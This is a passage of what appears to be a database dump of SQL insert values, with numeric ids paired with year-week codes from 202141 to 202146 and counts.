4444,1,'202141',7),(468,1,'202141',8),(484,1,'202141',8),(488,1,'202141',8),(1592,1,'202141',8),(1734,1,'202141',8),(2457,1,'202141',8),(2775,1,'202141',8),(2804,1,'202141',8),(2989,1,'202141',8),(3023,1,'202141',8),(3092,1,'202141',8),(3124,1,'202141',8),(3282,1,'202141',8),(3498,1,'202141',8),(4332,1,'202141',8),(4368,1,'202141',8),(4377,1,'202141',8),(4432,1,'202141',8),(473,1,'202141',9),(485,1,'202141',9),(1612,1,'202141',9),(2297,1,'202141',9),(2704,1,'202141',9),(2769,1,'202141',9),(2911,1,'202141',9),(3285,1,'202141',9),(3290,1,'202141',9),(3746,1,'202141',9),(4326,1,'202141',9),(335,1,'202141',10),(467,1,'202141',10),(470,1,'202141',10),(477,1,'202141',10),(487,1,'202141',10),(1596,1,'202141',10),(2956,1,'202141',10),(3117,1,'202141',10),(3251,1,'202141',10),(3742,1,'202141',10),(3771,1,'202141',10),(3777,1,'202141',10),(4338,1,'202141',10),(4436,1,'202141',10),(1584,1,'202141',11),(1604,1,'202141',11),(1614,1,'202141',11),(2609,1,'202141',11),(2809,1,'202141',11),(3127,1,'202141',11),(3764,1,'202141',11),(4335,1,'202141',11),(74,1,'202141',12),(474,1,'202141',12),(486,1,'202141',12),(3045,1,'202141',12),(3060,1,'202141',12),(4341,1,'202141',12),(469,1,'202141',13),(472,1,'202141',13),(1598,1,'202141',13),(3069,1,'202141',13),(1600,1,'202141',14),(3083,1,'202141',14),(4238,1,'202141',14),(76,1,'202141',15),(89,1,'202141',15),(1582,1,'202141',15),(3063,1,'202141',15),(84,1,'202141',16),(1606,1,'202141',16),(2813,1,'202141',16),(1718,1,'202141',17),(4400,1,'202141',17),(108,1,'202141',18),(1608,1,'202141',18),(87,1,'202141',19),(91,1,'202141',19),(1728,1,'202141',19),(2296,1,'202141',19),(68,1,'202141',20),(2503,1,'202141',20),(1588,1,'202141',22),(1544,1,'202141',24),(1594,1,'202141',24),(1586,1,'202141',26),(3781,1,'202141',26),(72,1,'202141',31),(1602,1,'202141',35),(2159,1,'202141',37),(2309,1,'202141',65),(80,1,'202141',69),(3030,1,'202141',80),(2904,1,'202141',91),(9,1,'202141',858),(106,1,'202142',1),(1747,1,'202142',1),(1780,1,'202142',1),(3027,1,'202142',1),(3104,1,'202142',1),(3229,1,'202142',1),(3267,1,'202142',1),(3269,1,'202142',1),(477,1,'202142',2),(1697,1,'202142',2),(1715,1,'202142',2),(1739,1,'202142',2),(1743,1,'202142',2),(1745,1,'202142',2),(1768,1,'202142',2),(1772,1,'202142',2),(1776,1,'202142',2),(2154,1,'202142',2),(2252,1,'202142',2),(2293,1,'202142',2),(2297,1,'202142',2),(2704,1,'202142',2),(2964,1,'202142',2),(2993,1,'202142',2),(3006,1,'202142',2),(3102,1,'202142',2),(3273,1,'202142',2),(3275,1,'202142',2),(3282,1,'202142',2),(3287,1,'202142',2),(3489,1,'202142',2),(1584,1,'202142',3),(1610,1,'202142',3),(1699,1,'202142',3),(1701,1,'202142',3),(1705,1,'202142',3),(1707,1,'202142',3),(1711,1,'202142',3),(1713,1,'202142',3),(1720,1,'202142',3),(1749,1,'202142',3),(1774,1,'202142',3),(2152,1,'202142',3),(2751,1,'202142',3),(2801,1,'202142',3),(2804,1,'202142',3),(2911,1,'202142',3),(3066,1,'202142',3),(3079,1,'202142',3),(3092,1,'202142',3),(3096,1,'202142',3),(3097,1,'202142',3),(3124,1,'202142',3),(3240,1,'202142',3),(3243,1,'202142',3),(3245,1,'202142',3),(3247,1,'202142',3),(3249,1,'202142',3),(3259,1,'202142',3),(3263,1,'202142',3),(3271,1,'202142',3),(3280,1,'202142',3),(3297,1,'202142',3),(3498,1,'202142',3),(3531,1,'202142',3),(3541,1,'202142',3),(3721,1,'202142',3),(3738,1,'202142',3),(3774,1,'202142',3),(4275,1,'202142',3),(467,1,'202142',4),(471,1,'202142',4),(480,1,'202142',4),(481,1,'202142',4),(485,1,'202142',4),(486,1,'202142',4),(488,1,'202142',4),(1590,1,'202142',4),(1604,1,'202142',4),(1703,1,'202142',4),(1709,1,'202142',4),(1732,1,'202142',4),(1734,1,'202142',4),(1737,1,'202142',4),(1741,1,'202142',4),(1751,1,'202142',4),(1766,1,'202142',4),(1778,1,'202142',4),(2148,1,'202142',4),(2150,1,'202142',4),(2156,1,'202142',4),(2165,1,'202142',4),(2956,1,'202142',4),(2965,1,'202142',4),(2989,1,'202142',4),(2991,1,'202142',4),(3041,1,'202142',4),(3261,1,'202142',4),(3265,1,'202142',4),(3278,1,'202142',4),(3285,1,'202142',4),(3316,1,'202142',4),(3731,1,'202142',4),(3746,1,'202142',4),(3749,1,'202142',4),(4363,1,'202142',4),(4377,1,'202142',4),(4387,1,'202142',4),(4404,1,'202142',4),(4436,1,'202142',4),(110,1,'202142',5),(476,1,'202142',5),(482,1,'202142',5),(1726,1,'202142',5),(2609,1,'202142',5),(2658,1,'202142',5),(2775,1,'202142',5),(3004,1,'202142',5),(3038,1,'202142',5),(3060,1,'202142',5),(3107,1,'202142',5),(3251,1,'202142',5),(3479,1,'202142',5),(3534,1,'202142',5),(3714,1,'202142',5),(3727,1,'202142',5),(3735,1,'202142',5),(3771,1,'202142',5),(4301,1,'202142',5),(4357,1,'202142',5),(4382,1,'202142',5),(4408,1,'202142',5),(4412,1,'202142',5),(4428,1,'202142',5),(474,1,'202142',6),(478,1,'202142',6),(483,1,'202142',6),(1592,1,'202142',6),(1598,1,'202142',6),(2161,1,'202142',6),(2248,1,'202142',6),(2617,1,'202142',6),(2748,1,'202142',6),(2769,1,'202142',6),(3090,1,'202142',6),(3109,1,'202142',6),(3226,1,'202142',6),(3290,1,'202142',6),(3307,1,'202142',6),(3430,1,'202142',6),(3438,1,'202142',6),(3486,1,'202142',6),(3752,1,'202142',6),(4329,1,'202142',6),(4335,1,'202142',6),(4338,1,'202142',6),(4373,1,'202142',6),(4424,1,'202142',6),(4432,1,'202142',6),(479,1,'202142',7),(1596,1,'202142',7),(1614,1,'202142',7),(1728,1,'202142',7),(1730,1,'202142',7),(1770,1,'202142',7),(2178,1,'202142',7),(2813,1,'202142',7),(3034,1,'202142',7),(3117,1,'202142',7),(3127,1,'202142',7),(3253,1,'202142',7),(3257,1,'202142',7),(3482,1,'202142',7),(3742,1,'202142',7),(4368,1,'202142',7),(4391,1,'202142',7),(102,1,'202142',8),(470,1,'202142',8),(473,1,'202142',8),(570,1,'202142',8),(1718,1,'202142',8),(1722,1,'202142',8),(1724,1,'202142',8),(2063,1,'202142',8),(2558,1,'202142',8),(2809,1,'202142',8),(3087,1,'202142',8),(3724,1,'202142',8),(4323,1,'202142',8),(4396,1,'202142',8),(4444,1,'202142',8),(84,1,'202142',9),(472,1,'202142',9),(484,1,'202142',9),(1695,1,'202142',9),(3005,1,'202142',9),(3045,1,'202142',9),(3072,1,'202142',9),(3313,1,'202142',9),(3710,1,'202142',9),(3777,1,'202142',9),(4332,1,'202142',9),(4416,1,'202142',9),(4420,1,'202142',9),(4440,1,'202142',9),(108,1,'202142',10),(487,1,'202142',10),(2296,1,'202142',10),(4448,1,'202142',10),(469,1,'202142',11),(3063,1,'202142',11),(4326,1,'202142',11),(4341,1,'202142',11),(74,1,'202142',12),(468,1,'202142',12),(2159,1,'202142',12),(3069,1,'202142',12),(4238,1,'202142',12),(2457,1,'202142',13),(3083,1,'202142',13),(3781,1,'202142',13),(335,1,'202142',14),(1582,1,'202142',14),(4400,1,'202142',14),(1588,1,'202142',15),(1606,1,'202142',15),(1544,1,'202142',17),(89,1,'202142',18),(1594,1,'202142',18),(1608,1,'202142',18),(3764,1,'202142',18),(68,1,'202142',19),(1600,1,'202142',19),(1612,1,'202142',19),(4457,1,'202142',19),(76,1,'202142',20),(87,1,'202142',20),(2503,1,'202142',20),(91,1,'202142',21),(4454,1,'202142',26),(2309,1,'202142',29),(1586,1,'202142',30),(3030,1,'202142',35),(72,1,'202142',37),(1602,1,'202142',46),(80,1,'202142',70),(2904,1,'202142',103),(9,1,'202142',807),(110,1,'202143',1),(470,1,'202143',1),(481,1,'202143',1),(483,1,'202143',1),(1705,1,'202143',1),(1709,1,'202143',1),(1780,1,'202143',1),(2558,1,'202143',1),(2617,1,'202143',1),(2991,1,'202143',1),(3041,1,'202143',1),(3063,1,'202143',1),(3438,1,'202143',1),(3541,1,'202143',1),(3752,1,'202143',1),(4329,1,'202143',1),(4416,1,'202143',1),(4440,1,'202143',1),(102,1,'202143',2),(467,1,'202143',2),(480,1,'202143',2),(482,1,'202143',2),(1590,1,'202143',2),(1697,1,'202143',2),(1701,1,'202143',2),(1718,1,'202143',2),(1745,1,'202143',2),(1747,1,'202143',2),(1772,1,'202143',2),(2152,1,'202143',2),(2252,1,'202143',2),(2658,1,'202143',2),(2748,1,'202143',2),(2801,1,'202143',2),(2989,1,'202143',2),(3038,1,'202143',2),(3066,1,'202143',2),(3072,1,'202143',2),(3090,1,'202143',2),(3253,1,'202143',2),(3275,1,'202143',2),(3313,1,'202143',2),(3479,1,'202143',2),(3498,1,'202143',2),(3534,1,'202143',2),(3724,1,'202143',2),(3731,1,'202143',2),(3735,1,'202143',2),(3738,1,'202143',2),(3742,1,'202143',2),(4377,1,'202143',2),(4420,1,'202143',2),(74,1,'202143',3),(476,1,'202143',3),(479,1,'202143',3),(485,1,'202143',3),(486,1,'202143',3),(1596,1,'202143',3),(1695,1,'202143',3),(1711,1,'202143',3),(1713,1,'202143',3),(1734,1,'202143',3),(1737,1,'202143',3),(1743,1,'202143',3),(1770,1,'202143',3),(1778,1,'202143',3),(1782,1,'202143',3),(2148,1,'202143',3),(2161,1,'202143',3),(2775,1,'202143',3),(2965,1,'202143',3),(3023,1,'202143',3),(3060,1,'202143',3),(3069,1,'202143',3),(3097,1,'202143',3),(3104,1,'202143',3),(3226,1,'202143',3),(3229,1,'202143',3),(3245,1,'202143',3),(3251,1,'202143',3),(3265,1,'202143',3),(3267,1,'202143',3),(3271,1,'202143',3),(3278,1,'202143',3),(3282,1,'202143',3),(3285,1,'202143',3),(3287,1,'202143',3),(3290,1,'202143',3),(3486,1,'202143',3),(3531,1,'202143',3),(3727,1,'202143',3),(3749,1,'202143',3),(3774,1,'202143',3),(4323,1,'202143',3),(4387,1,'202143',3),(4404,1,'202143',3),(4408,1,'202143',3),(4432,1,'202143',3),(469,1,'202143',4),(471,1,'202143',4),(477,1,'202143',4),(478,1,'202143',4),(488,1,'202143',4),(1699,1,'202143',4),(1724,1,'202143',4),(1730,1,'202143',4),(1732,1,'202143',4),(1739,1,'202143',4),(1741,1,'202143',4),(1766,1,'202143',4),(2063,1,'202143',4),(2296,1,'202143',4),(2964,1,'202143',4),(3027,1,'202143',4),(3034,1,'202143',4),(3045,1,'202143',4),(3079,1,'202143',4),(3083,1,'202143',4),(3096,1,'202143',4),(3102,1,'202143',4),(3109,1,'202143',4),(3117,1,'202143',4),(3124,1,'202143',4),(3240,1,'202143',4),(3243,1,'202143',4),(3247,1,'202143',4),(3257,1,'202143',4),(3259,1,'202143',4),(3261,1,'202143',4),(3263,1,'202143',4),(3269,1,'202143',4),(3297,1,'202143',4),(3482,1,'202143',4),(3489,1,'202143',4),(3714,1,'202143',4),(4275,1,'202143',4),(4301,1,'202143',4),(4326,1,'202143',4),(4332,1,'202143',4),(4373,1,'202143',4),(4382,1,'202143',4),(4391,1,'202143',4),(4396,1,'202143',4),(4412,1,'202143',4),(4424,1,'202143',4),(4428,1,'202143',4),(4436,1,'202143',4),(4444,1,'202143',4),(4448,1,'202143',4),(468,1,'202143',5),(474,1,'202143',5),(570,1,'202143',5),(1592,1,'202143',5),(1610,1,'202143',5),(1715,1,'202143',5),(1749,1,'202143',5),(1751,1,'202143',5),(1768,1,'202143',5),(1774,1,'202143',5),(2150,1,'202143',5),(2159,1,'202143',5),(2165,1,'202143',5),(2609,1,'202143',5),(2704,1,'202143',5),(2769,1,'202143',5),(2911,1,'202143',5),(2956,1,'202143',5),(3249,1,'202143',5),(3307,1,'202143',5),(3430,1,'202143',5),(3721,1,'202143',5),(3777,1,'202143',5),(4357,1,'202143',5),(4454,1,'202143',5),(472,1,'202143',6),(473,1,'202143',6),(487,1,'202143',6),(1594,1,'202143',6),(1598,1,'202143',6),(1703,1,'202143',6),(1720,1,'202143',6),(1722,1,'202143',6),(2156,1,'202143',6),(2178,1,'202143',6),(2751,1,'202143',6),(2993,1,'202143',6),(3004,1,'202143',6),(3092,1,'202143',6),(3280,1,'202143',6),(3316,1,'202143',6),(3746,1,'202143',6),(4238,1,'202143',6),(4338,1,'202143',6),(4341,1,'202143',6),(4363,1,'202143',6),(4368,1,'202143',6),(4400,1,'202143',6),(1584,1,'202143',7),(1776,1,'202143',7),(2804,1,'202143',7),(3087,1,'202143',7),(3107,1,'202143',7),(3273,1,'202143',7),(84,1,'202143',8),(335,1,'202143',8),(1588,1,'202143',8),(1726,1,'202143',8),(3005,1,'202143',8),(3127,1,'202143',8),(4335,1,'202143',8),(1604,1,'202143',9),(2809,1,'202143',9),(3006,1,'202143',9),(108,1,'202143',10),(2813,1,'202143',10),(3781,1,'202143',10),(76,1,'202143',11),(1612,1,'202143',11),(1614,1,'202143',11),(2457,1,'202143',11),(3710,1,'202143',11),(3764,1,'202143',11),(68,1,'202143',12),(91,1,'202143',12),(1582,1,'202143',12),(1606,1,'202143',12),(1608,1,'202143',12),(89,1,'202143',13),(1544,1,'202143',13),(2503,1,'202143',13),(3030,1,'202143',13),(87,1,'202143',14),(1600,1,'202143',14),(1728,1,'202143',14),(2309,1,'202143',14),(2154,1,'202143',15),(2297,1,'202143',18),(4457,1,'202143',20),(72,1,'202143',23),(1602,1,'202143',24),(1586,1,'202143',25),(80,1,'202143',53),(2904,1,'202143',66),(9,1,'202143',782),(1720,1,'202144',1),(3240,1,'202144',1),(3489,1,'202144',1),(3541,1,'202144',1),(3777,1,'202144',1),(4357,1,'202144',1),(110,1,'202144',2),(476,1,'202144',2),(1739,1,'202144',2),(2956,1,'202144',2),(3027,1,'202144',2),(3102,1,'202144',2),(3124,1,'202144',2),(3249,1,'202144',2),(3261,1,'202144',2),(3265,1,'202144',2),(3275,1,'202144',2),(3278,1,'202144',2),(3280,1,'202144',2),(3287,1,'202144',2),(3297,1,'202144',2),(3307,1,'202144',2),(3735,1,'202144',2),(3752,1,'202144',2),(3774,1,'202144',2),(4275,1,'202144',2),(4368,1,'202144',2),(106,1,'202144',3),(471,1,'202144',3),(1709,1,'202144',3),(1713,1,'202144',3),(1722,1,'202144',3),(1734,1,'202144',3),(1747,1,'202144',3),(1749,1,'202144',3),(2152,1,'202144',3),(2748,1,'202144',3),(2751,1,'202144',3),(3083,1,'202144',3),(3092,1,'202144',3),(3096,1,'202144',3),(3229,1,'202144',3),(3243,1,'202144',3),(3247,1,'202144',3),(3257,1,'202144',3),(3269,1,'202144',3),(3273,1,'202144',3),(3316,1,'202144',3),(3479,1,'202144',3),(3486,1,'202144',3),(3534,1,'202144',3),(3727,1,'202144',3),(3738,1,'202144',3),(4373,1,'202144',3),(4391,1,'202144',3),(4420,1,'202144',3),(478,1,'202144',4),(483,1,'202144',4),(487,1,'202144',4),(488,1,'202144',4),(1705,1,'202144',4),(1732,1,'202144',4),(1751,1,'202144',4),(1780,1,'202144',4),(2154,1,'202144',4),(2165,1,'202144',4),(2801,1,'202144',4),(2804,1,'202144',4),(2964,1,'202144',4),(2965,1,'202144',4),(2993,1,'202144',4),(3004,1,'202144',4),(3107,1,'202144',4),(3127,1,'202144',4),(3253,1,'202144',4),(3263,1,'202144',4),(3290,1,'202144',4),(3313,1,'202144',4),(3714,1,'202144',4),(3721,1,'202144',4),(3731,1,'202144',4),(3749,1,'202144',4),(4329,1,'202144',4),(4363,1,'202144',4),(4387,1,'202144',4),(4396,1,'202144',4),(4432,1,'202144',4),(4444,1,'202144',4),(74,1,'202144',5),(102,1,'202144',5),(477,1,'202144',5),(479,1,'202144',5),(485,1,'202144',5),(1703,1,'202144',5),(1707,1,'202144',5),(1715,1,'202144',5),(1724,1,'202144',5),(1730,1,'202144',5),(1737,1,'202144',5),(1741,1,'202144',5),(1770,1,'202144',5),(1772,1,'202144',5),(1776,1,'202144',5),(1782,1,'202144',5),(2150,1,'202144',5),(2178,1,'202144',5),(2293,1,'202144',5),(2297,1,'202144',5),(2617,1,'202144',5),(2658,1,'202144',5),(2911,1,'202144',5),(3006,1,'202144',5),(3034,1,'202144',5),(3079,1,'202144',5),(3087,1,'202144',5),(3090,1,'202144',5),(3097,1,'202144',5),(3109,1,'202144',5),(3117,1,'202144',5),(3226,1,'202144',5),(3245,1,'202144',5),(3251,1,'202144',5),(3267,1,'202144',5),(3285,1,'202144',5),(3742,1,'202144',5),(4301,1,'202144',5),(4377,1,'202144',5),(4382,1,'202144',5),(4408,1,'202144',5),(4424,1,'202144',5),(4436,1,'202144',5),(4440,1,'202144',5),(4448,1,'202144',5),(474,1,'202144',6),(480,1,'202144',6),(481,1,'202144',6),(482,1,'202144',6),(484,1,'202144',6),(1610,1,'202144',6),(1701,1,'202144',6),(1718,1,'202144',6),(1743,1,'202144',6),(1766,1,'202144',6),(1768,1,'202144',6),(1778,1,'202144',6),(2063,1,'202144',6),(2252,1,'202144',6),(2296,1,'202144',6),(2775,1,'202144',6),(2991,1,'202144',6),(3041,1,'202144',6),(3072,1,'202144',6),(3104,1,'202144',6),(3259,1,'202144',6),(3438,1,'202144',6),(3498,1,'202144',6),(3746,1,'202144',6),(4326,1,'202144',6),(4332,1,'202144',6),(4404,1,'202144',6),(4412,1,'202144',6),(4428,1,'202144',6),(468,1,'202144',7),(1590,1,'202144',7),(1697,1,'202144',7),(1699,1,'202144',7),(1726,1,'202144',7),(1745,1,'202144',7),(1774,1,'202144',7),(2148,1,'202144',7),(2156,1,'202144',7),(2248,1,'202144',7),(2769,1,'202144',7),(3023,1,'202144',7),(3060,1,'202144',7),(3063,1,'202144',7),(3066,1,'202144',7),(3271,1,'202144',7),(3430,1,'202144',7),(3482,1,'202144',7),(3531,1,'202144',7),(3771,1,'202144',7),(4238,1,'202144',7),(4323,1,'202144',7),(4338,1,'202144',7),(472,1,'202144',8),(473,1,'202144',8),(486,1,'202144',8),(570,1,'202144',8),(1584,1,'202144',8),(1592,1,'202144',8),(1695,1,'202144',8),(1711,1,'202144',8),(2161,1,'202144',8),(3710,1,'202144',8),(3781,1,'202144',8),(4400,1,'202144',8),(335,1,'202144',9),(469,1,'202144',9),(1596,1,'202144',9),(2558,1,'202144',9),(2609,1,'202144',9),(2704,1,'202144',9),(2809,1,'202144',9),(3038,1,'202144',9),(4416,1,'202144',9),(467,1,'202144',10),(470,1,'202144',10),(1728,1,'202144',10),(2457,1,'202144',10),(3045,1,'202144',10),(4454,1,'202144',10),(108,1,'202144',11),(1588,1,'202144',11),(2159,1,'202144',11),(2813,1,'202144',11),(3724,1,'202144',11),(87,1,'202144',12),(89,1,'202144',12),(1582,1,'202144',12),(1614,1,'202144',12),(2503,1,'202144',12),(2989,1,'202144',12),(3282,1,'202144',12),(1604,1,'202144',13),(2309,1,'202144',13),(3005,1,'202144',13),(3069,1,'202144',13),(3764,1,'202144',13),(4335,1,'202144',13),(4341,1,'202144',14),(76,1,'202144',15),(91,1,'202144',16),(1544,1,'202144',16),(1606,1,'202144',16),(1594,1,'202144',17),(3030,1,'202144',17),(1612,1,'202144',19),(84,1,'202144',21),(1598,1,'202144',22),(1608,1,'202144',22),(72,1,'202144',25),(1600,1,'202144',26),(68,1,'202144',28),(1586,1,'202144',30),(1602,1,'202144',37),(4457,1,'202144',38),(80,1,'202144',62),(2904,1,'202144',62),(9,1,'202144',784),(106,1,'202145',1),(486,1,'202145',1),(488,1,'202145',1),(1584,1,'202145',1),(1610,1,'202145',1),(1705,1,'202145',1),(1711,1,'202145',1),(1715,1,'202145',1),(1743,1,'202145',1),(1774,1,'202145',1),(2063,1,'202145',1),(2152,1,'202145',1),(2156,1,'202145',1),(2248,1,'202145',1),(2296,1,'202145',1),(2775,1,'202145',1),(2991,1,'202145',1),(3023,1,'202145',1),(3027,1,'202145',1),(3066,1,'202145',1),(3079,1,'202145',1),(3092,1,'202145',1),(3096,1,'202145',1),(3243,1,'202145',1),(3247,1,'202145',1),(3249,1,'202145',1),(3257,1,'202145',1),(3263,1,'202145',1),(3267,1,'202145',1),(3269,1,'202145',1),(3479,1,'202145',1),(3489,1,'202145',1),(3498,1,'202145',1),(3714,1,'202145',1),(3727,1,'202145',1),(3731,1,'202145',1),(3774,1,'202145',1),(102,1,'202145',2),(479,1,'202145',2),(480,1,'202145',2),(481,1,'202145',2),(483,1,'202145',2),(1701,1,'202145',2),(1713,1,'202145',2),(1732,1,'202145',2),(1734,1,'202145',2),(1751,1,'202145',2),(1768,1,'202145',2),(1770,1,'202145',2),(1780,1,'202145',2),(2161,1,'202145',2),(2252,1,'202145',2),(2964,1,'202145',2),(3006,1,'202145',2),(3041,1,'202145',2),(3063,1,'202145',2),(3097,1,'202145',2),(3107,1,'202145',2),(3124,1,'202145',2),(3240,1,'202145',2),(3261,1,'202145',2),(3275,1,'202145',2),(3280,1,'202145',2),(3430,1,'202145',2),(3438,1,'202145',2),(3534,1,'202145',2),(3541,1,'202145',2),(3710,1,'202145',2),(3738,1,'202145',2),(3749,1,'202145',2),(3771,1,'202145',2),(470,1,'202145',3),(471,1,'202145',3),(473,1,'202145',3),(474,1,'202145',3),(476,1,'202145',3),(477,1,'202145',3),(1596,1,'202145',3),(1695,1,'202145',3),(1697,1,'202145',3),(1703,1,'202145',3),(1709,1,'202145',3),(1718,1,'202145',3),(1741,1,'202145',3),(1766,1,'202145',3),(2154,1,'202145',3),(2159,1,'202145',3),(2165,1,'202145',3),(2178,1,'202145',3),(2293,1,'202145',3),(2609,1,'202145',3),(2704,1,'202145',3),(2748,1,'202145',3),(2751,1,'202145',3),(2956,1,'202145',3),(2993,1,'202145',3),(3087,1,'202145',3),(3104,1,'202145',3),(3245,1,'202145',3),(3253,1,'202145',3),(3265,1,'202145',3),(3271,1,'202145',3),(3273,1,'202145',3),(3297,1,'202145',3),(3313,1,'202145',3),(3316,1,'202145',3),(3486,1,'202145',3),(3721,1,'202145',3),(3777,1,'202145',3),(4357,1,'202145',3),(4382,1,'202145',3),(4404,1,'202145',3),(4408,1,'202145',3),(4432,1,'202145',3),(478,1,'202145',4),(482,1,'202145',4),(1590,1,'202145',4),(1707,1,'202145',4),(1724,1,'202145',4),(1730,1,'202145',4),(1745,1,'202145',4),(1749,1,'202145',4),(1778,1,'202145',4),(2148,1,'202145',4),(2658,1,'202145',4),(2769,1,'202145',4),(2965,1,'202145',4),(3034,1,'202145',4),(3038,1,'202145',4),(3072,1,'202145',4),(3090,1,'202145',4),(3102,1,'202145',4),(3109,1,'202145',4),(3117,1,'202145',4),(3285,1,'202145',4),(3307,1,'202145',4),(3531,1,'202145',4),(3735,1,'202145',4),(4338,1,'202145',4),(4363,1,'202145',4),(4373,1,'202145',4),(4400,1,'202145',4),(4440,1,'202145',4),(4444,1,'202145',4),(74,1,'202145',5),(484,1,'202145',5),(570,1,'202145',5),(1614,1,'202145',5),(1720,1,'202145',5),(1722,1,'202145',5),(1726,1,'202145',5),(1737,1,'202145',5),(2617,1,'202145',5),(2813,1,'202145',5),(3004,1,'202145',5),(3083,1,'202145',5),(3278,1,'202145',5),(3290,1,'202145',5),(4275,1,'202145',5),(4301,1,'202145',5),(4368,1,'202145',5),(4387,1,'202145',5),(4412,1,'202145',5),(4428,1,'202145',5),(4436,1,'202145',5),(469,1,'202145',6),(472,1,'202145',6),(1592,1,'202145',6),(1612,1,'202145',6),(1739,1,'202145',6),(2801,1,'202145',6),(2804,1,'202145',6),(2911,1,'202145',6),(2989,1,'202145',6),(3482,1,'202145',6),(3724,1,'202145',6),(4323,1,'202145',6),(4326,1,'202145',6),(4377,1,'202145',6),(4396,1,'202145',6),(4424,1,'202145',6),(335,1,'202145',7),(468,1,'202145',7),(487,1,'202145',7),(1582,1,'202145',7),(1728,1,'202145',7),(1747,1,'202145',7),(1776,1,'202145',7),(3045,1,'202145',7),(3069,1,'202145',7),(3251,1,'202145',7),(3746,1,'202145',7),(3752,1,'202145',7),(4238,1,'202145',7),(4332,1,'202145',7),(4420,1,'202145',7),(4448,1,'202145',7),(2297,1,'202145',8),(3764,1,'202145',8),(4329,1,'202145',8),(4391,1,'202145',8),(76,1,'202145',9),(467,1,'202145',9),(1604,1,'202145',9),(2503,1,'202145',9),(2809,1,'202145',9),(4454,1,'202145',9),(108,1,'202145',10),(1594,1,'202145',10),(1608,1,'202145',10),(3060,1,'202145',10),(3127,1,'202145',10),(4416,1,'202145',11),(91,1,'202145',13),(1544,1,'202145',13),(3282,1,'202145',13),(4341,1,'202145',13),(87,1,'202145',14),(1588,1,'202145',14),(1606,1,'202145',14),(3781,1,'202145',14),(4335,1,'202145',14),(84,1,'202145',15),(2457,1,'202145',15),(3005,1,'202145',15),(3030,1,'202145',17),(1598,1,'202145',18),(89,1,'202145',21),(2309,1,'202145',22),(68,1,'202145',25),(1600,1,'202145',25),(1586,1,'202145',26),(1602,1,'202145',29),(72,1,'202145',33),(4457,1,'202145',33),(80,1,'202145',50),(2904,1,'202145',51),(9,1,'202145',775),(471,1,'202146',1),(481,1,'202146',1),(488,1,'202146',1),(1713,1,'202146',1),(1724,1,'202146',1),(1726,1,'202146',1),(1741,1,'202146',1),(1747,1,'202146',1),(1770,1,'202146',1),(1772,1,'202146',1),(1774,1,'202146',1),(2063,1,'202146',1),(2751,1,'202146',1),(2993,1,'202146',1),(3004,1,'202146',1),(3006,1,'202146',1),(3063,1,'202146',1),(3087,1,'202146',1),(3096,1,'202146',1),(3117,1,'202146',1),(3247,1,'202146',1),(3265,1,'202146',1),(3316,1,'202146',1),(3479,1,'202146',1),(3541,1,'202146',1),(3749,1,'202146',1),(3774,1,'202146',1),(4275,1,'202146',1),(4391,1,'202146',1),(4396,1,'202146',1),(4440,1,'202146',1),(74,1,'202146',2),(102,1,'202146',2),(106,1,'202146',2),(476,1,'202146',2),(485,1,'202146',2),(486,1,'202146',2),(1590,1,'202146',2),(1596,1,'202146',2),(1610,1,'202146',2),(1695,1,'202146',2),(1697,1,'202146',2),(1701,1,'202146',2),(1705,1,'202146',2),(1730,1,'202146',2),(1732,1,'202146',2),(1739,1,'202146',2),(1743,1,'202146',2),(1745,1,'202146',2),(1749,1,'202146',2),(1751,1,'202146',2),(1766,1,'202146',2),(2152,1,'202146',2),(2161,1,'202146',2),(2165,1,'202146',2),(2252,1,'202146',2),(2296,1,'202146',2),(2297,1,'202146',2),(2704,1,'202146',2),(2775,1,'202146',2),(2801,1,'202146',2),(2956,1,'202146',2),(2964,1,'202146',2),(2965,1,'202146',2),(3023,1,'202146',2),(3027,1,'202146',2),(3066,1,'202146',2),(3092,1,'202146',2),(3107,1,'202146',2),(3109,1,'202146',2),(3124,1,'202146',2),(3226,1,'202146',2),(3229,1,'202146',2),(3240,1,'202146',2),(3261,1,'202146',2),(3267,1,'202146',2),(3269,1,'202146',2),(3278,1,'202146',2),(3280,1,'202146',2),(3287,1,'202146',2),(3297,1,'202146',2),(3735,1,'202146',2),(3771,1,'202146',2),(3777,1,'202146',2),(4301,1,'202146',2),(4329,1,'202146',2),(4373,1,'202146',2),(4404,1,'202146',2),(4408,1,'202146',2),(4428,1,'202146',2),(110,1,'202146',3),(473,1,'202146',3),(474,1,'202146',3),(1584,1,'202146',3),(1707,1,'202146',3),(1711,1,'202146',3),(1715,1,'202146',3),(1722,1,'202146',3),(1728,1,'202146',3),(2150,1,'202146',3),(2293,1,'202146',3),(2558,1,'202146',3),(2748,1,'202146',3),(2911,1,'202146',3),(2989,1,'202146',3),(3034,1,'202146',3),(3079,1,'202146',3),(3083,1,'202146',3),(3090,1,'202146',3),(3102,1,'202146',3),(3243,1,'202146',3),(3249,1,'202146',3),(3251,1,'202146',3),(3253,1,'202146',3),(3257,1,'202146',3),(3263,1,'202146',3),(3273,1,'202146',3),(3275,1,'202146',3),(3313,1,'202146',3),(3486,1,'202146',3),(3489,1,'202146',3),(3724,1,'202146',3),(3727,1,'202146',3),(3731,1,'202146',3),(3738,1,'202146',3),(3746,1,'202146',3),(4332,1,'202146',3),(4338,1,'202146',3),(4357,1,'202146',3),(4368,1,'202146',3),(4377,1,'202146',3),(4387,1,'202146',3),(4420,1,'202146',3),(4432,1,'202146',3),(91,1,'202146',4),(469,1,'202146',4),(478,1,'202146',4),(479,1,'202146',4),(480,1,'202146',4),(484,1,'202146',4),(487,1,'202146',4),(1592,1,'202146',4),(1776,1,'202146',4),(1782,1,'202146',4),(2154,1,'202146',4),(2156,1,'202146',4),(2248,1,'202146',4),(2769,1,'202146',4),(2804,1,'202146',4),(3041,1,'202146',4),(3097,1,'202146',4),(3245,1,'202146',4),(3259,1,'202146',4),(3282,1,'202146',4),(3290,1,'202146',4),(3438,1,'202146',4),(3498,1,'202146',4),(3531,1,'202146',4),(3742,1,'202146',4),(3752,1,'202146',4),(3781,1,'202146',4),(4323,1,'202146',4),(4335,1,'202146',4),(4382,1,'202146',4),(4412,1,'202146',4),(4424,1,'202146',4),(4448,1,'202146',4),(84,1,'202146',5),(335,1,'202146',5),(468,1,'202146',5),(477,1,'202146',5),(482,1,'202146',5),(483,1,'202146',5),(1614,1,'202146',5),(1703,1,'202146',5),(1737,1,'202146',5),(1768,1,'202146',5),(2609,1,'202146',5),(2617,1,'202146',5),(2658,1,'202146',5),(2991,1,'202146',5),(3038,1,'202146',5),(3072,1,'202146',5),(3104,1,'202146',5),(3307,1,'202146',5),(3482,1,'202146',5),(3534,1,'202146',5),(4363,1,'202146',5),(4454,1,'202146',5),(570,1,'202146',6),(1699,1,'202146',6),(1718,